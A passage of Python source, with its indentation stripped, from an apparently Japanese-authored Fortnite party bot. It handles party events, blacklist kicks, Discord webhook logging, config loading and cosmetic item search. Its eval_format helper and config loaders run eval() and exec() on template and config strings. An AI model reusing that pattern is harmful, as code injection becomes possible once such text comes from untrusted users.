if not self.isready or not member:
return
self.add_cache(member)
if self.party.me.leader and member.id != self.user.id and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_kick",name(member.party.leader),name(member),member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_kick",f'{name(member.party.leader)} [{platform_to_str(member.party.leader.platform)}/{member.party.leader.input}]',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_party_member_promote(self, old_leader: fortnitepy.PartyMember, new_leader: fortnitepy.PartyMember) -> None:
if not self.isready or not old_leader or not new_leader:
return
self.add_cache(old_leader)
self.add_cache(new_leader)
display_name = name(self.user)
display_name_ = self.is_most()
try:
if new_leader.id == self.user.id:
if data['fortnite']['hide-user']:
await self.hide()
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_promote",name(old_leader),name(new_leader)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_promote",f'{name(old_leader)} [{platform_to_str(old_leader.platform)}/{old_leader.input}]',f'{name(new_leader)} [{platform_to_str(new_leader.platform)}/{new_leader.input}]'),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if new_leader.id == self.user.id:
try:
await self.party.set_playlist(data['fortnite']['playlist'])
await client.party.set_privacy(data['fortnite']['privacy'].value)
if data["fortnite"]["disable_voice"]:
await self.disable_voice()
for member in self.party.members:
if member.id in blacklist:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_playlist_change(self, party: fortnitepy.ClientParty, before: tuple, after: tuple) -> None:
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,after[0])
async def event_party_member_update(self, member: fortnitepy.PartyMember) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_member_update", f"{name(member)} [{platform_to_str(member.platform)}/{member.input}]"),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if member.id == self.user.id:
return
if member.id in blacklist and self.party.me.leader:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_outfit_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_outfit_change(member)
async def event_party_member_backpack_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_backpack_change(member)
async def event_party_member_pet_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_backpack_change(member)
async def event_party_member_pickaxe_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_pickaxe_change(member)
async def event_party_member_emote_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_emote_change(member)
async def event_party_member_emoji_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_emote_change(member)
async def event_party_member_zombie(self, member: fortnitepy.PartyMember) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_disconnect",name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_disconnect",f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]'),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if self.party.me.leader:
try:
await member.kick()
except Exception:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_chatban(self, member: fortnitepy.PartyMember, reason: Optional[str]) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
if not reason:
send(display_name_,l("party_member_chatban",name(member.party.leader),name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_chatban2",name(member.party.leader),name(member),reason),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
if not reason:
send(display_name_,l("party_member_chatban",name(member.party.leader),name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_chatban2",f'{name(member.party.leader)} [{platform_to_str(member.party.leader.platform)}/{member.party.leader.input}]',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',reason),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_party_update(self, party: fortnitepy.Party) -> None:
if not self.isready or not party:
return
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_update"),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_friend_message(self, message: fortnitepy.FriendMessage) -> None:
await process_command(message)
async def event_party_message(self, message: fortnitepy.PartyMessage) -> None:
await process_command(message)
if True: #Functions
def now() -> str:
return datetime.datetime.now().strftime("%H:%M:%S")
def l(key: str, *args: Any, **kwargs: Any) -> Optional[str]:
text = localize.get(key)
if text:
return text.format(*args, **kwargs)
else:
return None
def name(user: Union[fortnitepy.user.UserBase, discord.user.User, WebUser]) -> str:
if data['loglevel'] == 'normal':
return user.display_name
else:
return f"{user.display_name} / {user.id}"
def render_template(file_: str, **kwargs: Any) -> str:
template = env.get_template(file_)
return sanic.response.html(template.render(**kwargs))
def dprint() -> None:
text_max = 1990
while True:
if data['discord-log']:
if data['skip-if-overflow'] and len(storedlogs) >= 50:
storedlogs.clear()
for num,log in enumerate(storedlogs):
try:
username = list(log.keys())[0]
content = list(log.values())[0]
if len(content) > text_max:
if data["omit-over2000"]:
text = content[:text_max] + "..."
res = requests.post(
data['webhook'],
json={
'username': username,
'content': text
}
)
else:
text = [content[i:i+text_max] for i in range(0, len(content), text_max)]
for text_ in text:
res = requests.post(
data['webhook'],
json={
'username': username,
'content': text_
}
)
if res.status_code == 429:
break
else:
continue
break
else:
res = requests.post(
data['webhook'],
json={
'username': username,
'content': content
}
)
if res.status_code == 204:
storedlogs.pop(num)
if res.status_code == 429:
break
except TypeError:
if data['loglevel'] =='debug':
print(red(traceback.format_exc()))
try:
storedlogs.pop(num)
except Exception:
pass
continue
except Exception:
print(red(traceback.format_exc()))
print(red(f"{username}: {content} の送信中にエラーが発生しました"))
continue
time.sleep(5)
def dstore(username: str, content: Any) -> None:
if data['discord-log']:
if data['hide-email']:
for email in data['fortnite']['email']:
content = content.replace(email,len(email)*"X")
if data['hide-token']:
for token in data['discord']['token'].split(','):
content = content.replace(token,len(token)*"X")
if data['hide-webhook']:
for webhook in data['webhook'].split(','):
content = content.replace(webhook,len(webhook)*"X")
if len(storedlogs) > 0:
if list(storedlogs[len(storedlogs)-1].keys())[0] == username:
storedlogs[len(storedlogs)-1][username] += f'\n{content}'
else:
storedlogs.append({username: content})
else:
storedlogs.append({username: content})
def send(user_name: str, content: Any, color: Optional[Callable] = None, add_p: Optional[Callable] = None, add_d: Optional[Callable] = None) -> Optional[str]:
content = str(content)
if not data['no-logs'] or color is red:
if not color:
if not add_p:
print(content)
else:
print(add_p(content))
else:
if not add_p:
print(color(content))
else:
print(color(add_p(content)))
content = discord.utils.escape_markdown(content)
if not add_d:
dstore(user_name,content)
else:
dstore(user_name,add_d(content))
def split_ignore(text: str, ignore: Optional[str] = None) -> list:
temp = ""
text_list = []
for char in text:
if char.split() != []:
temp += char
elif char != ignore:
if temp != "":
text_list.append(temp)
temp = ""
text_list.append("")
if temp != "":
text_list.append(temp)
return text_list
def eval_format(text: str, variables: dict = {}) -> str:
for match in format_pattern.finditer(text):
match_text = match.group()
eval_text = match_text.replace("{","",1)[::-1].replace("}","",1)[::-1]
result = eval(eval_text,globals(),variables)
text = text.replace(match_text,str(result),1)
return text
def get_client_data(id_: str) -> defaultdict:
var = defaultdict(lambda: None)
for client in clients:
if not client.isready:
continue
if client.user.id == id_:
break
else:
return var
party = getattr(client,"party",None)
if party:
config = party.config
var.update(
{
"party_id": party.id,
"party_size": party.member_count,
"party_max_size": config["max_size"]
}
)
var.update(
{
"friend_count": len(client.friends),
"pending_count": len(client.pending_friends),
"incoming_pending_count": len(client.incoming_pending_friends),
"outgoing_pending_count": len(client.outgoing_pending_friends),
"block_count": len(client.blocked_users),
"display_name": client.user.display_name,
"id": client.user.id,
"boot_time": int(time.time() - dclient.boot_time)
}
)
return var
def get_guild_member_count(id_: Union[str]) -> Optional[int]:
if isinstance(id_,str):
id_ = int(id_)
guild = dclient.get_guild(id_)
if guild is None:
return None
return guild.member_count
def platform_to_str(platform: fortnitepy.Platform) -> Optional[str]:
converter = {
fortnitepy.Platform.WINDOWS: "Windows",
fortnitepy.Platform.MAC: "Mac",
fortnitepy.Platform.PLAYSTATION: "PlayStation",
fortnitepy.Platform.XBOX: "Xbox",
fortnitepy.Platform.SWITCH: "Switch",
fortnitepy.Platform.IOS: "IOS",
fortnitepy.Platform.ANDROID: "Android"
}
return converter.get(platform)
def convert_to_type(text: str) -> Optional[str]:
if True in [text.lower() in commands[key] for key in outfit_keys] or text.lower().startswith("cid_"):
return "Outfit"
elif True in [text.lower() in commands[key] for key in backpack_keys] or text.lower().startswith("bid_"):
return "Back Bling"
elif True in [text.lower() in commands[key] for key in pet_keys] or text.lower().startswith("petcarrier_"):
return "Pet"
elif True in [text.lower() in commands[key] for key in pickaxe_keys] or text.lower().startswith("pickaxe_id"):
return "Harvesting Tool"
elif True in [text.lower() in commands[key] for key in emote_keys] or text.lower().startswith("eid_"):
return "Emote"
elif True in [text.lower() in commands[key] for key in emoji_keys] or text.lower().startswith("emoji_"):
return "Emoticon"
elif True in [text.lower() in commands[key] for key in toy_keys] or text.lower().startswith("toy_"):
return "Toy"
elif True in [text.lower() in commands[key] for key in item_keys]:
return "Item"
def convert_to_asset(text: str) -> Optional[str]:
if True in [text.lower() in commands[key] for key in outfit_keys] or text.lower().startswith("cid_"):
return "outfit"
elif True in [text.lower() in commands[key] for key in backpack_keys] or text.lower().startswith("bid_"):
return "backpack"
elif True in [text.lower() in commands[key] for key in pet_keys] or text.lower().startswith("petcarrier_"):
return "backpack"
elif True in [text.lower() in commands[key] for key in pickaxe_keys] or text.lower().startswith("pickaxe_id"):
return "pickaxe"
elif True in [text.lower() in commands[key] for key in emote_keys] or text.lower().startswith("eid_"):
return "emote"
elif True in [text.lower() in commands[key] for key in emoji_keys] or text.lower().startswith("emoji_"):
return "emote"
elif True in [text.lower() in commands[key] for key in toy_keys] or text.lower().startswith("toy_"):
return "emote"
def convert_to_id(text: str) -> Optional[str]:
if True in [text.lower() in commands[key] for key in outfit_keys] or text.lower().startswith("cid_"):
return "cid"
elif True in [text.lower() in commands[key] for key in backpack_keys] or text.lower().startswith("bid_"):
return "bid"
elif True in [text.lower() in commands[key] for key in pet_keys] or text.lower().startswith("petcarrier_"):
return "petcarrier"
elif True in [text.lower() in commands[key] for key in pickaxe_keys] or text.lower().startswith("pickaxe_id"):
return "pickaxe_id"
elif True in [text.lower() in commands[key] for key in emote_keys] or text.lower().startswith("eid_"):
return "eid"
elif True in [text.lower() in commands[key] for key in emoji_keys] or text.lower().startswith("emoji_"):
return "emoji_id"
elif True in [text.lower() in commands[key] for key in toy_keys] or text.lower().startswith("toy_"):
return "toy_id"
elif True in [text.lower() in commands[key] for key in item_keys]:
return "id"
def convert_to_old_type(text: str) -> Optional[str]:
converter = {
"outfit": "outfit",
"back bling": "backpack",
"pet": "pet",
"harvesting tool": "pickaxe",
"emote": "emote",
"emoticon":" emoji",
"toy": "toy",
"item": "item"
}
return converter.get(text.lower())
def convert_to_new_type(text: str) -> Optional[str]:
converter = {
"outfit": "Outfit",
"backpack": "Back Bling",
"pet": "Pet",
"pickaxe": "Harvesting Tool",
"emote": "Emote",
"emoji": "Emoticon",
"toy": "Toy",
"item": "Item"
}
return converter.get(text.lower())
def convert_backend_type(backendType: str) -> str:
converter = {
"AthenaBackpack": "Back Bling",
"AthenaPickaxe": "Harvesting Tool",
"AthenaItemWrap": "Wrap",
"AthenaGlider": "Glider",
"AthenaCharacter": "Outfit",
"AthenaPet": "Pet",
"AthenaMusicPack": "Music",
"AthenaLoadingScreen": "Loading Screen",
"AthenaDance": "Emote",
"AthenaSpray": "Spray",
"AthenaEmoji": "Emoticon",
"AthenaSkyDiveContrail": "Contrail",
"AthenaPetCarrier": "Pet",
"AthenaToy": "Toy",
"AthenaConsumableEmote": "Emote",
"AthenaBattleBus": "Battle Bus",
"AthenaRewardEventGraphCosmetic": "Outfit",
"AthenaVictoryPose": "Emote"
}
return converter.get(backendType)
def convert_variant(type_: str, variants: dict) -> List[dict]:
result = []
for variant in variants:
for option in variant['options']:
result.append({"name": option['name'], 'variants': [{'item': type_, 'channel': variant['channel'], 'variant': option['tag']}]})
return result
def get_device_auth_details() -> None:
if os.path.isfile(filename):
with open(filename, 'r') as f:
return json.load(f)
return {}
def store_device_auth_details(email: str, details: dict) -> None:
existing = get_device_auth_details()
existing[email.lower()] = details
with open(filename, 'w') as f:
json.dump(existing, f)
def load_json(filename: str) -> Union[list,dict]:
try:
with open(filename,encoding='utf-8') as f:
data = json.load(f)
except (json.decoder.JSONDecodeError, UnicodeDecodeError):
try:
with open(filename,encoding='utf-8-sig') as f:
data = json.load(f)
except (json.decoder.JSONDecodeError, UnicodeDecodeError):
with open(filename,encoding='shift_jis') as f:
data = json.load(f)
return data
def load_config(client: Optional[fortnitepy.Client] = None) -> bool:
global data
global commands
global replies
try:
data = load_json("config.json")
except json.decoder.JSONDecodeError as e:
send('ボット',f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send('ボット','config.json ファイルの読み込みに失敗しました。正しく書き込めているか確認してください',red,add_d=lambda x:f'>>> {x}')
send('Bot','Failed to load config.json file. Make sure you wrote correctly',red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send('ボット','config.json ファイルが存在しません',red,add_d=lambda x:f'>>> {x}')
send('Bot','config.json file does not exist',red,add_d=lambda x:f'>>> {x}')
return False
if data.get('loglevel','normal') == 'debug':
send('ボット',f'\n{json.dumps(data,ensure_ascii=False,indent=4)}\n',yellow,add_d=lambda x:f'\n```{x}```\n')
for key,tags in config_tags_raw.items():
try:
value = eval(f"data{key}")
except KeyError:
error_config.append(key)
else:
if isinstance(value,dict):
continue
if bool_ in tags:
if not isinstance(value,bool):
error_config.append(key)
elif bool_none in tags:
if not isinstance(value,(bool,None.__class__)):
error_config.append(key)
elif "can_be_multiple" in tags:
if not isinstance(value,list):
if str in tags:
error_config.append(key)
try:
exec(f"data{key} = value.split(',')")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif int in tags:
error_config.append(key)
try:
exec(f"data{key} = [value]")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
if not isinstance(value,tags[0]):
error_config.append(key)
try:
exec(f"data{key} = tags[0](value)")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
checks = [
['fortnite','owner'],
['fortnite','blacklist'],
['fortnite','whitelist'],
['fortnite','invitelist'],
['fortnite','otherbotlist'],
['discord','owner'],
['discord','blacklist'],
['discord','whitelist']
]
for check in checks:
k,k2 = check
try:
for value in data.get(k,{}).get(k2,[]).copy():
if len(str(value)) == 0:
data.get(k,{}).get(k2,[]).remove(value)
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
with open("config.json", 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=4)
def set_default(keys: list, default: Any, func: Optional[Callable] = None) -> None:
text = ""
text2 = ""
for nest,key in enumerate(keys,1):
text += f"['{key}']"
if nest == len(keys):
if isinstance(default,str):
text2 += f".get('''{key}''','''{default}''')"
else:
text2 += f".get('''{key}''',{default})"
else:
text2 += f"['''{key}''']"
if func:
var = func(eval(f"data{text2}"))
exec(f"data{text} = var")
else:
exec(f"data{text} = data{text2}")
set_default(['fortnite'],{})
set_default(['fortnite','outfit'],"")
set_default(['fortnite','outfit_style'],"")
set_default(['fortnite','backpack'],"")
set_default(['fortnite','backpack_style'],"")
set_default(['fortnite','pickaxe'],"")
set_default(['fortnite','pickaxe_style'],"")
set_default(['fortnite','emote'],"")
try:
set_default(['fortnite','privacy'],'public',lambda x: getattr(PartyPrivacy,x.upper()))
except AttributeError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_config.append("['fortnite']['privacy']")
set_default(['fortnite','avatar_color'],'#ffffff,#ffffff,#ffffff')
set_default(['discord','channels'],['{name}-command-channel'],lambda x: [i.replace(" ","-").replace(".","-").replace(",","-").replace("--","-").lower() for i in x])
try:
set_default(['discord','status_type'],'playing',lambda x: getattr(discord.ActivityType,x.lower()))
except AttributeError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_config.append("['discord']['status_type']")
set_default(['web'],{})
set_default(['web','ip'],'{ip}')
set_default(['web','port'],8080)
set_default(['web','login_required'],False)
set_default(['lang'],'en')
set_default(['caseinsensitive'],False)
set_default(['no-logs'],False)
set_default(['discord-log'],False)
set_default(['search_max'],60)
set_default(['omit-over2000'],False)
set_default(['skip-if-overflow'],False)
set_default(['hide-email'],False)
set_default(['hide-token'],False)
set_default(['hide-webhook'],False)
set_default(['loglevel'],'normal')
if data.get("status",1) == 0:
config_tags["['fortnite']['email']"].append("red")
config_tags["['lang']"].append("red")
if os.getcwd().startswith('/app') or os.getcwd().startswith('/home/runner'):
data['web']['ip']="0.0.0.0"
else:
data['web']['ip'] = data['web']['ip'].format(ip=socket.gethostbyname(socket.gethostname()))
if client:
client.status_ = data['fortnite']['status']
client.whisper = data['fortnite']['whisper']
client.partychat = data['fortnite']['partychat']
client.discord = data['discord']['discord']
client.web = data['web']['web']
client.whisperperfect = data['fortnite']['disablewhisperperfectly']
client.partychatperfect = data['fortnite']['disablepartychatperfectly']
client.discordperfect = data['discord']['disablediscordperfectly']
client.joinmessageenable = data['fortnite']['joinmessageenable']
client.randommessageenable = data['fortnite']['randommessageenable']
client.outfitmimic = data['fortnite']['outfitmimic']
client.backpackmimic = data['fortnite']['backpackmimic']
client.pickaxemimic = data['fortnite']['pickaxemimic']
client.emotemimic = data['fortnite']['emotemimic']
client.outfitlock = data['fortnite']['outfitlock']
client.backpacklock = data['fortnite']['backpacklock']
client.pickaxelock = data['fortnite']['pickaxelock']
client.emotelock = data['fortnite']['emotelock']
client.acceptinvite = data['fortnite']['acceptinvite']
client.acceptfriend = data['fortnite']['acceptfriend']
if error_config:
send('ボット',f'config.json ファイルの読み込みに失敗しました。キーの名前が間違っていないか確認してください。アップデート後の場合は、最新のconfig.jsonファイルを確認してください\n{", ".join(error_config)} がありません',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'Failed to load config.json file. Make sure key name is correct. If this after update, plase check latest config.json file\n{", ".join(error_config)} is missing',red,add_d=lambda x:f'>>> {x}')
os.makedirs("items/", exist_ok=True)
def load_lang(lang: str) -> None:
global localize
try:
localize = load_json(f"lang/{lang}.json")
except json.decoder.JSONDecodeError as e:
send('ボット',f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send('ボット',f'{data["lang"]}.json ファイルの読み込みに失敗しました。正しく書き込めているか確認してください\n',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'Failed to load {data["lang"]}.json file. Make sure you wrote correctly',red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send('ボット',f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send('ボット',f'{data["lang"]}.json ファイルが存在しません',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'{data["lang"]}.json file does not exist',red,add_d=lambda x:f'>>> {x}')
return False
return True
if os.path.isfile(f"lang/{data['lang']}.json"):
if not load_lang(data['lang']):
return False
else:
if not load_lang("en"):
return False
color = data['fortnite']['avatar_color'].split(',') if data['fortnite']['avatar_color'] else ""
if len(color) > 2:
background_colors = [color[0], color[1], color[2]]
elif len(color) == 1:
try:
background_colors = eval(f"fortnitepy.KairosBackgroundColorPreset.{color[0]}")
except (AttributeError, SyntaxError):
send(l('bot'),l('color_must_be'))
error_config.append("['fortnite']['avatar_color']")
background_colors = ["#ffffff","#ffffff","#ffffff"]
else:
background_colors = None
data['fortnite']['avatar_color'] = background_colors
try:
commands = load_json("commands.json")
except json.decoder.JSONDecodeError as e:
send(l('bot'),f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_json", "commands.json"),red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_notfound", "commands.json"),red,add_d=lambda x:f'>>> {x}')
return False
if data['loglevel'] == 'debug':
send(l('bot'),f'\n{json.dumps(commands,ensure_ascii=False,indent=4)}\n',yellow,add_d=lambda x:f'\n```{x}```\n')
for key,tags in commands_tags.items():
try:
value = eval(f"commands{key}")
except KeyError:
error_commands.append(key)
else:
if not isinstance(value,list):
try:
exec(f"commands{key} = value.split(',')")
except Exception:
if data["loglevel"] == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_commands.append(key)
with open("commands.json", 'w', encoding='utf-8') as f:
json.dump(commands, f, ensure_ascii=False, indent=4)
def set_default_(key: str, default: Any, func: Optional[Callable] = None) -> None:
text = f"['{key}']"
text2 = f".get('{key}','{default}')"
if func:
exec(f"commands{text} = {func}(commands{text2})")
else:
exec(f"commands{text} = commands{text2}")
set_default_("usercommands","")
if error_commands:
send(l('bot'),f'{l("load_failed_keyerror", "commands.json")}\n{l("is_missing", ", ".join(error_commands))}',red,add_d=lambda x:f'>>> {x}')
if data['caseinsensitive']:
commands = {k.lower(): [jaconv.kata2hira(c.lower()) for c in v] for k,v in commands.items()}
flag = True
commands['ownercommands'] = []
if "{all}" in commands['usercommands']:
for command in (list(commands_tags.keys()) + ["cid_","bid_","petcarrier_","pickaxe_id_","eid_","emoji_","toy_","item-search"]):
command = command.replace("['","",1).replace("']","",1)
if command in ["usercommands","true","false","me","privacy_public","privacy_friends_allow_friends_of_friends","privacy_friends","privacy_private_allow_friends_of_friends","privacy_private","info_party"]:
continue
if command in [i.lower() for i in commands['usercommands']]:
commands['ownercommands'].append(command)
else:
for command in (list(commands_tags.keys()) + ["cid_","bid_","petcarrier_","pickaxe_id_","eid_","emoji_","toy_","item-search"]):
command = command.replace("['","",1).replace("']","",1)
if command in ["usercommands","true","false","me","privacy_public","privacy_friends_allow_friends_of_friends","privacy_friends","privacy_private_allow_friends_of_friends","privacy_private","info_party"]:
continue
if command not in [i.lower() for i in commands['usercommands']]:
commands['ownercommands'].append(command)
try:
replies = load_json("replies.json")
except json.decoder.JSONDecodeError as e:
send(l('bot'),f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_json", "replies.json"),red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_notfound", "replies.json"),red,add_d=lambda x:f'>>> {x}')
return False
return True
def get_item_data(lang: str) -> dict:
res = requests.get("https://benbotfn.tk/api/v1/cosmetics/br", params={"lang": lang})
if res.status_code == 200:
return res.json()
return None
def store_item_data(langs: list) -> None:
with ThreadPoolExecutor() as executor:
futures = {executor.submit(get_item_data,lang): lang for lang in langs}
for future in as_completed(futures):
lang = futures[future]
result = future.result()
data_ = {}
if data["loglevel"] == "debug":
send(l("bot"),f"Saving {lang} items",yellow)
for item in result:
type_ = convert_backend_type(item["backendType"])
if type_ in ignoretype:
continue
if not data_.get(type_):
data_[type_] = []
data_[type_].append(item)
for type_,items in data_.items():
with open(f"items/{type_}_{lang}.json","w",encoding="utf-8") as f:
json.dump(items,f,ensure_ascii=False,indent=4)
if data["loglevel"] == "debug":
send(l("bot"),f"Saved {lang} items",yellow)
def partymember_backpack(member: fortnitepy.party.PartyMemberBase) -> str:
asset = member.meta.backpack
result = re.search(r".*\.([^\'\"]*)", asset.strip("'"))
if result and result.group(1) != 'None':
return result.group(1)
def partymember_emote(member: fortnitepy.party.PartyMemberBase) -> str:
asset = member.meta.emote
result = re.search(r".*\.([^\'\"]*)", asset.strip("'"))
if result and result.group(1) != 'None':
return result.group(1)
def member_asset(member: fortnitepy.party.PartyMemberBase, asset: str) -> str:
if asset in ("backpack", "pet"):
return partymember_backpack(member)
elif asset in ("emote", "emoji", "toy"):
return partymember_emote(member)
else:
return getattr(member, asset, None)
def search_item(lang: str, mode: str, text: str, type_: Optional[str] = None, cache: Optional[bool] = True) -> Optional[List[dict]]:
itemlist = []
if not cache_items.get(lang):
cache_items[lang] = []
if cache:
if mode == 'set':
data_ = cache_items[lang]
else:
data_ = [i for i in cache_items[lang] if convert_backend_type(i["backendType"]) in type_.split(',')]
else:
data_ = []
if type_ not in ["Item", None]:
with ThreadPoolExecutor() as executor:
def _open_file(filename: str) -> Union[list, dict]:
with open(filename, 'r', encoding='utf-8') as f:
d = json.load(f)
return d
futures = [executor.submit(_open_file,f'items/{i}_{lang}.json') for i in type_.split(',')]
for future in futures:
data_.extend(future.result())
else:
with ThreadPoolExecutor() as executor:
def _open_file(filename: str) -> Union[list, dict]:
with open(filename, 'r', encoding='utf-8') as f:
d = json.load(f)
return d
def _(text: str) -> str:
return re.sub(r"items(\\|/)","",text).replace(f"_{lang}.json","")
futures = [executor.submit(_open_file,f'items/{_(i)}_{lang}.json') for i in glob(f"items/*_{lang}.json") if _(i)[0].isupper()]
for future in futures:
data_.extend(future.result())
for item in data_:
try:
if convert_backend_type(item["backendType"]) in ignoretype or item in itemlist or item.get("name") is None:
continue
if mode == "name":
if data['caseinsensitive']:
text_ = jaconv.hira2kata(text.lower())
name = jaconv.hira2kata(item['name'].lower())
else:
text_ = text
name = item['name']
if text_ in name:
itemlist.append(item)
elif mode == "id":
text_ = text
if text_.lower() in item['id'].lower():
itemlist.append(item)
elif mode == "set":
if not item.get('set'):
continue
if data['caseinsensitive']:
text_ = jaconv.hira2kata(text.lower())
name = jaconv.hira2kata(item['set'].lower())
else:
text_ = text
name = item['set']
if text_ in name:
itemlist.append(item)
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),item,red,add_d=lambda x:f'>>> {x}')
if len(itemlist) == 0:
if cache:
return search_item(lang=lang, mode=mode, text=text, type_=type_, cache=False)
else:
return None
else:
if not cache:
for item in itemlist:
if item not in cache_items[lang]:
cache_items[lang].append(item)
return itemlist
def search_style(lang: str, id_: str, type_: str, cache: Optional[bool] = True) -> Optional[List[dict]]:
if not cache_items.get(lang):
cache_items[lang] = []
if cache:
data_ = cache_items[lang]
else:
data_ = []
if type_ != "Item":
with ThreadPoolExecutor() as executor:
futures = [executor.submit(load_json,f'items/{i}_{lang}.json') for i in type_.split(',')]
for future in futures:
data_.extend(future.result())
else:
with ThreadPoolExecutor() as executor:
def _(text: str) -> str:
return re.sub(r"items(\\|/)","",text).replace(f"_{lang}.json","")
futures = [executor.submit(load_json,f'items/{_(i)}_{lang}.json') for i in glob(f"items/*_{lang}.json") if _(i)[0].isupper()]
for future in futures:
data_.extend(future.result())
variants = None
for item in data_:
if item['id'].lower() == id_.lower():
if item['variants']:
variants = convert_variant(item['backendType'], item['variants'])
break
if not variants:
if cache:
return search_style(lang=lang, id_=id_, type_=type_, cache=False)
else:
return None
else:
if not cache:
